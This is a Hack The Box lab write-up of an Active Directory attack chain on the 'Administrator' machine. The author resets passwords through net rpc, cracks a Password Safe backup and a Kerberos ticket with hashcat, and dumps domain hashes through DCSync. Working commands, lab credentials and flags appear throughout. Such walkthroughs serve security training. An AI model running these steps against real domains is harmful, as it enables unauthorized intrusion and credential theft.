Administrator - HTB

- 5 mins read
Details
URL Hack The Box :: Administrator
Difficulty Medium
User Solves U: 7241 ~ R: 7025
Release Date 09 Nov, 2024

Overview

This machine simulates a realistic internal Windows Active Directory environment. The initial access is granted with the following credentials:

  • Username: olivia
  • Password: ichliebedich

Reconnaissance

Rustscan + Nmap

A Rustscan quick sweep followed by Nmap revealed the following open ports:

PORT      STATE SERVICE      VERSION
21/tcp    open  ftp          Microsoft ftpd
53/tcp    open  domain       Simple DNS Plus
88/tcp    open  kerberos-sec Microsoft Windows Kerberos
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
464/tcp   open  kpasswd5?
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (WinRM)
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0
49666/tcp open  msrpc        
49854/tcp open  ncacn_http   Microsoft RPC over HTTP
49859/tcp open  msrpc
49914/tcp open  msrpc
62532/tcp open  msrpc

Key services: FTP (21), Kerberos (88), and WinRM (5985)

Initial Foothold - Olivia (Standard User)

Tested the provided credentials:

  • FTP: Access denied
  • WinRM: Success
evil-winrm -i administrator.htb -u olivia -p ichliebedich

Confirmed access as administrator\olivia. Enumeration with whoami /all showed:

  • No local admin rights
  • Key privileges: SeMachineAccountPrivilege

Olivia is a standard domain user with WinRM access.

BloodHound Enumeration

Using BloodHound with bloodhound-python:

bloodhound-python -c All -u olivia -p 'ichliebedich' -d administrator.htb -ns 10.129.126.236

The tool successfully connected to the domain controller (dc.administrator.htb) via LDAP and retrieved the following data:

  • 1 domain
  • 1 domain controller
  • 11 users
  • 53 groups
  • 2 GPOs
  • 1 OU
  • 19 containers

Computer enumeration completed in under 10 seconds, confirming only one system (dc.administrator.htb) in scope.

This dataset was then imported into the GUI for analysis. At this stage, I began exploring possible attack paths such as:

  • Shortest Path to Domain Admins
  • Users with Delegation Rights
  • Users with Local Admin Access
  • Attack paths involving GPO abuse or RBCD

BloodHound GenericAll

Key findings:

  • Only 1 domain controller: dc.administrator.htb
  • Olivia has GenericAll over user michael

Privilege Escalation to Michael

To assess privilege level and potential escalation paths, I ran:

whoami /all

The output indicates the user is administrator\michael, with the following SID:

S-1-5-21-1088858960-373806567-254189436-1109

Michael is a member of the following groups:

  • BUILTIN\Users
  • BUILTIN\Remote Management Users
  • NT AUTHORITY\Authenticated Users

Notably, Michael is not part of the Administrators group, and like Olivia, his privileges appear limited.

However, Michael has the following enabled privileges:

  • SeMachineAccountPrivilege – May allow creating machine accounts in AD.
  • SeChangeNotifyPrivilege – Standard privilege for directory traversal.
  • SeIncreaseWorkingSetPrivilege – Minor impact, common among standard users.

At this point, Michael appears to be another low-privileged user, but may have different or extended access within the domain. The next step is to re-enumerate the domain environment with Michael’s credentials to identify any new attack paths.

Reset password via net rpc:

net rpc password michael BigCh33se1337! -U "administrator.htb/olivia%ichliebedich" -S 10.129.126.236

Access confirmed via SMB and WinRM:

evil-winrm -i administrator.htb -u michael -p 'BigCh33se1337!'

Evil-WinRM (Michael)

Michael has similar privileges as Olivia.

Michael -> Benjamin (Graph)

Michael → Benjamin

BloodHound shows Michael has ForceChangePassword over benjamin.

net rpc password benjamin BigCh33se1337 -U "administrator.htb/michael%BigCh33se1337!" -S 10.129.126.236

Confirmed access over SMB.

Benjamin had access to FTP, revealing a .psafe3 backup file.

FTP Directory (Benjamin)
PasswordSafe File

Benjamin → Password Safe Dump

According to google, Hashcat has a module just for this. The Password Safe file was cracked using Hashcat (mode 5200), revealing credentials:

Hashcat Cracked Password

emily: UXLCI5iETUsIBoFVTj8yQFKoHjXmb
alexander: UrkIbagoxMyUGw0aPlj9B0AXSea4Sw
emma: WwANQWnmJnGV07WQN8bMS7FMAbjNur

PasswordSafe Output

Only Emily’s credentials worked with WinRM:

evil-winrm -i administrator.htb -u emily -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb'

🎯 User Flag

50a726ce7a8a7ae8fa18eec845436658

Emily → Ethan via Kerberoasting

BloodHound showed GenericWrite over ethan. Using this, an SPN was added:

A Service Principal Name (SPN) is a unique identifier that links a service instance to a specific service account within a Kerberos environment. In a Kerberoasting attack, an authenticated user can request a service ticket for a known SPN. The resulting ticket is encrypted with the password hash of the associated service account. If that password is weak, it can be cracked offline. I’ve previously used this technique in Blazorized—that time with WriteSPN rights; in this case, I’ll be exploiting GenericWrite instead.

Using the GenericWrite privilege over the user ethan, I’ll assign a custom SPN to their account. This allows me to request a service ticket for that SPN, forcing the system to return a ticket encrypted with Ethan’s password hash. If the password is weak, I’ll be able to crack it offline.

after much struggle with Clock Skews.


sudo ntpdate 10.129.126.236
2025-05-05 04:29:35.667078 (+0000) -0.036966 +/- 0.028348 10.129.126.236 s1 no-leap

python3 targetedKerberoast.py -v -d administrator.htb -u emily -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb' --dc-ip 10.129.126.236

[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[VERBOSE] SPN added successfully for (ethan)
[+] Printing hash for (ethan)

Hash dumped:

$krb5tgs$23$*ethan$ADMINISTRATOR.HTB...

Cracked with hashcat:

hashcat -m 13100 ethan.hash rockyou.txt

→ Password: limpbizkit

Ethan Password Cracked

Access confirmed via SMB. However, no WinRM.

Ethan → Administrator via DCSync

BloodHound reveals Ethan has DCSync privileges.

Ethan DCSync Permission

Used secretsdump.py to dump domain hashes:

secretsdump.py administrator.htb/ethan:[email protected]

Hash Dump Screen

Dumped the administrator NTLM hash:

Administrator:d56282f276b0<REDACTED>

WinRM access as Administrator:

evil-winrm -i administrator.htb -u administrator -H d56282f276b0...

Admin Shell

Final Outcome

🏁 Root Flag

d56282f276b0<REDACTED>

Summary of Attack Path

  1. Olivia (WinRM)

    • Standard domain user

  2. BloodHound → GenericAll → Michael

    • Reset password via RPC

  3. Michael → ForceChangePassword → Benjamin

    • Reset via RPC, accessed FTP backup

  4. Benjamin → Password Safe

    • Extracted Emily’s credentials

  5. Emily → GenericWrite → Ethan

    • Kerberoasting to extract & crack password

  6. Ethan → DCSync → Administrator

    • Dumped hashes and logged in as Admin